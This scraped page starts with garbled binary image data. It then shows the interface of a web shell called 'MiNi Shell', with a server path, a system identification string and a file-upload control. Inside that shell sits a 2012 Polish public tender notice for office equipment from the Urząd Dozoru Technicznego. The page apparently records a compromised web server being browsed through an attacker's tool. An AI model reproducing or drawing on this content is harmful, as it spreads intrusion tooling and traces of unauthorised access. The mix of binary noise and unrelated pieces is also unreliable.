JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/435724-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu biurowego dla 18 jednostek terenowych Urzędu Dozoru Technicznego w 2012 roku, znak sprawy: ZP-AL-78/12</b><br>
<b>Numer ogłoszenia: 435724 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dozoru Technicznego , ul. Szczęśliwicka 34, 02-353 Warszawa, woj. mazowieckie, tel. 022 5722100, faks 022 5722388.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.udt.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu biurowego dla 18 jednostek terenowych Urzędu Dozoru Technicznego w 2012 roku, znak sprawy: ZP-AL-78/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa sprzętu biurowego dla 18 jednostek terenowych Urzędu Dozoru Technicznego w 2012 roku, zwanego dalej towarem lub sprzętem.
2.	Szczegółowy opis przedmiotu zamówienia został zawarty w Załącznikach nr 2, 6, 7 i 10 do SIWZ.

UWAGA: Oferowane przez Wykonawcę rozmiary (wielkości/parametry) sprzętu - wskazane przez Zamawiającego w formularzu cenowym mogą różnić się: +/- 5% - pod warunkiem, że zmiana rozmiaru (wielkości) nie wpływa na specyfikę produktu, nie pomniejsza jego funkcjonalności lub wynika ze standardowej wielkości produktu.
3.	Dostarczany towar musi być fabrycznie nowy, wyprodukowany w 2012 r., nie może nosić śladów uszkodzeń zewnętrznych, uprzedniego używania oraz musi spełniać wszystkie wymogi określone w niniejszej SIWZ oraz Załącznikach do SIWZ.
Dostarczony sprzęt biurowy, stanowiący przedmiot zamówienia musi być dopuszczony do obrotu na terenie UE oraz spełniać aktualne warunki oznakowania CE i być tym znakiem oznaczony. 
4.	Przywołane we wzorze umowy oraz załącznikach do niej - modele sprzętu oraz producenci są doprecyzowaniem szczegółowego opisu przedmiotu zamówienia, możliwe jest zaoferowanie towarów równoważnych opisywanym przez Zamawiającego w niniejszej SIWZ oraz załącznikach do SIWZ.
5.  Zamawiający dopuszcza towary równoważne opisywanym przez Zamawiającego pod warunkiem zachowania parametrów określonych w opisie przedmiotu zamówienia stanowiącym Załącznik nr 2 do SIWZ oraz w Załączniku nr 1 do wzoru umowy - nie gorszych, służących do tego samego celu, oraz o porównywalnych (ekwiwalentnych) właściwościach i jakości.
6.	Miejsce wykonania zamówienia: siedziba Urzędu Dozoru Technicznego w Warszawie oraz wskazane oddziały UDT - zgodnie z Załącznikiem nr 10 do SIWZ - Wykaz jednostek UDT (adresowy). 
7.	Dostarczony towar musi spełniać wszystkie wymagania określone w niniejszej SIWZ oraz załącznikach do SIWZ.
8.	Dostawy będą realizowane w godzinach pracy jednostek UDT i będą potwierdzone podpisanym przez obie strony protokołem odbioru przedmiotu dostawy.
9.	Dostawa towaru musi być zgłoszona przez Wykonawcę właściwej jednostce UDT, do której ma odbyć się dostawa (pocztą elektroniczną, faksem lub telefonicznie) na minimum 3 dni robocze przed datą dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.10.00-4, 30.19.14.00-8, 30.21.61.30-6, 30.23.21.00-5, 30.19.73.30-8, 42.99.42.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	 Ustala się wadium w wysokości: 1500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100).
2.   Wykonawca wnosi wadium:
      1)  w pieniądzu:
Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego, prowadzony przez Bank Gospodarstwa Krajowego o numerze:               05 1130 1017 0020 1214 7720 0001, zaznaczając w tytule przelewu temat: 
Wadium - Dostawa sprzętu biurowego dla UDT, znak sprawy: ZP-AL-78/12; 
Za datę wniesienia wadium w formie pieniężnej przyjmuje się datę uznania rachunku bankowego Zamawiającego

lub w jednej z poniżej podanych form:
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

3.   Wadium wnoszone w formie: poręczenia bankowego poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej 
lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w siedzibie Zamawiającego - pokój             nr 7.
Nie należy załączać oryginału dokumentu wadialnego do oferty (zaleca się, 
by Wykonawca do oferty załączył jedynie kopię dokumentu wadialnego). Oryginał dokumentu wadialnego, w formie opisanej w pkt 2 ppkt 2-5 należy wnieść w oddzielnej kopercie oznaczonej napisem - WADIUM DLA OFERTY - NAZWA FIRMY. 

UWAGA
Z treści gwarancji musi wynikać bezwarunkowe, nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium 
w okolicznościach określonych w art. 46 ust. 5 ustawy oraz w art. 46 ust. 4a ustawy. 

4.    Wadium musi być wniesione najpóźniej do terminu składania ofert. 
5.	  Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie składania ofert znajdzie się na rachunku bankowym Zamawiającego.
6.	  Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana 
za odrzuconą.
7.	  Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem pkt 11.
8.	  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
9.	  Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca będzie zobowiązany do wniesienia wadium w terminie określonym przez Zamawiającego. 
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, 
lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących  
po jego stronie.
12.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane 
wraz z odsetkami w przypadku, gdy Wykonawca:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie, 
b)	   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.

UWAGA !!! 
W przypadku składania wadium w formie innej niż pieniądz, dokument wadialny musi powoływać przesłanki wymienione w pkt 11 i 12.

13. W przypadku składania oferty wspólnej przez Wykonawców (konsorcjum), dokument wniesienia wadium winien wyraźnie wskazywać bądź na lidera konsorcjum bądź 
na jednego z członków konsorcjum albo na wszystkich jego członków.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie dostawy sprzętu biurowego w ramach, których realizowane były między innymi dostawy niszczarek o wartości zamówienia łącznie nie mniejszej niż 30.000,00 PLN brutto każda 
lub 
jedną dostawę sprzętu biurowego w ramach której realizowana była dostawa niszczarek o wartości zamówienia łącznie co najmniej 60.000,00 PLN brutto. 
W przypadku, gdy Wykonawca nadal wykonuje dostawy, wartość już wykonanej/wykonanych ww. dostaw/y na dzień składania ofert musi wynosić, co najmniej 30.000,00 PLN każda;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INNE DOKUMENTY I OŚWIADCZENIA, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:
1) 	Formularz ofertowy z wykorzystaniem wzoru stanowiącego Załącznik Nr 1
do SIWZ,

2)  Formularz cenowy wraz z opisem przedmiotu zamówienia -z wykorzystaniem wzoru stanowiącego odpowiednio Załącznik Nr 2 do SIWZ,

3)	Oświadczenie o powierzeniu / nie powierzeniu prac podwykonawcom z wykorzystaniem wzoru stanowiącego Załącznik Nr 5 do SIWZ.
       W przypadku wskazania podwykonawców, Wykonawca zobowiązany jest załączyć 
do oferty wypełnione i podpisane ww. oświadczenie z zakresem prac, jakie Wykonawca planuje zlecić Podwykonawcy. Brak dołączenia do oferty ww. oświadczenia Zamawiający uzna za potwierdzenie, że Wykonawca wykona całość prac bez udziału podwykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy, Zamawiający przewiduje możliwość dokonania zmiany  w umowie w następujących przypadkach:
1)	w przypadku, gdy zaprzestana zostanie produkcja danego wzoru, modelu sprzętu biurowego Zamawiający będzie mógł odstąpić od umowy w tym zakresie lub wyrazić zgodę na zastąpienie tego wzoru, modelu innym, o parametrach nie gorszych niż określone w umowie i załączniku do umowy zwierającym szczegółowy opis przedmiotu zamówienia (z zachowaniem ceny pierwotnie zamówionego sprzętu biurowego, po uprzedniej akceptacji zmiany przez Zamawiającego); 
2)	przedłużenie terminu wykonania umowy będzie możliwe w przypadku:
a)	z przyczyn organizacyjnych leżących po stronie Zamawiającego - np. braku możliwości udostępnienia pomieszczeń przez Zamawiającego do ustawienia sprzętu biurowego będącego przedmiotem zamówienia, 
b)	z przyczyn nie dających się przewidzieć w momencie podpisania umowy jeżeli opóźnienie będzie wynikało nie z winy Wykonawcy i zostanie pisemnie uzasadnione 
i zgłoszone do Zamawiającego, 
c)	z powodu działania siły wyższej uzasadniające przesunięcie terminu realizacji umowy.
3)	zmiana lub wprowadzenie podwykonawcy; 
4)	w przypadku zmiany osób upoważnionych do kontaktów ze strony Wykonawcy, jak 
i Zamawiającego wynikających z umowy, zmiany te mogą być dokonywane w drodze pisemnego powiadomienia drugiej strony umowy, za potwierdzeniem odbioru;
5)	wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.

Wszystkie postanowienia, o których mowa powyżej, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.udt.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) ze strony
internetowej Zamawiającego: www.udt.gov.pl - bezpłatnie, 2) odpłatnie - 19,50 zł za zaliczeniem
pocztowym lub w kasie UDT + koszt przesyłki za pobraniem...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 12:00, miejsce: Urząd Dozoru Technicznego
ul. Szczęśliwicka 34
02-353 Warszawa, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com